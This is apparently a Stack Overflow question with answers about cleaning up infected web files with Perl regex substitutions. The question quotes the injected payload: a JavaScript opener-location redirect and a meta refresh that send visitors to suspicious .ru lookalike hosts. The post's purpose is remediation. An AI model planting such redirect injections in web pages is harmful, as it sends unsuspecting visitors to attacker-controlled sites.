# How can I replace everything before the <html> tag with a Perl command?

Tags: regex, perl, unix

A folder on a webserver I manage was recently infected, and a malicious script was placed before the opening `<html>` tag on a whole mess of files.  I'm trying to execute a perl string replace script to clean it out.

The malicious files look something like this:

```
<script language="JavaScript">
parent.window.opener.location="http://vkk.coom.ny8pbpk.ru?nhzwhhh=ZE9taWlsX2nkPRE0LmZub3ffaUQ9PTM3MCbjb0RlNWFlZnrvaEx2b2JydWLuYUJxfwC%3D%3D";
</script>
<meta http-equiv="refresh" content="0;URL=http://yandex.ru.ny8pbpk.ru?pk=i%2FGWhteXsNcf0qzPwdiVgMkkhvrG1YbO25gYgPqe2saQmdIDmeiUlsiXmNEQmPCfhMSD5" />
<html>
<head>
......and the file goes on
```

I'm something of a mess with Regex, and I've tried to glean as much as I can from other StackOverflow posts on how to use perl's string replace.  The biggest issue I'm running into is making it work over multiple lines.

Here's what I have so far:

```
perl -0777 -i -pe 's/\s*<html>/<html>/s' index.html
```

This seems to have no effect.  If I change the second `<html>` to `<foobar>` it correctly replaces with foobar, but it ignores everything in front of it.

From what I can tell, the `-0777` flag is supposed to "slurp" as one line, and the `\s*` should match the entire string before `<html>`, but again, my regex is lacking.  Any help is greatly appreciated!

Answer (score 0, accepted):

`\s*` should be `[\s\S]*` so it matches all characters.

I found this as a great reference: http://www.cs.tut.fi/~jkorpela/perl/regexp.html

So the final working command is:

`perl -0777 -i -pe 's/[\s\S]*<html>/<html>/s' index.html`

Answer (score 2):

Try this:

```
perl -0777 -i -pe 's/^.*(?=<html>)//s' index.html
```

or this more safer and effective pattern:

```
perl -0777 -i -pe 's/^(?>[^<]++|<(?!html>))*(?=<html>)//' index.html
```

Comment: if the string '<html>' is not present in the infected part it's probably slightly safer to write `s/^.*?(?=<html>)//s`. This avoids deleting to much text if '<html>' is found somewhere in the body of the page (as in `<p>Example of an html document:</p><pre><![CDATA[<html>blah blah...</html>]]></pre>`). That's unlikely but who knows...

Answer (score 1):

\s* is too specific.  You don't only want to match whitespace before the .  Try .* which matches everything before the

Comment: Thanks, this helped steer me onto the right track!  The issue was that \s was only matching whitespaces.  [\s\S] will match whitespace or non-whitespace, which is everything!

Comment: . (dot) does the same thing and is a more common pattern.  Less code and what readers of your code are more likely to expect.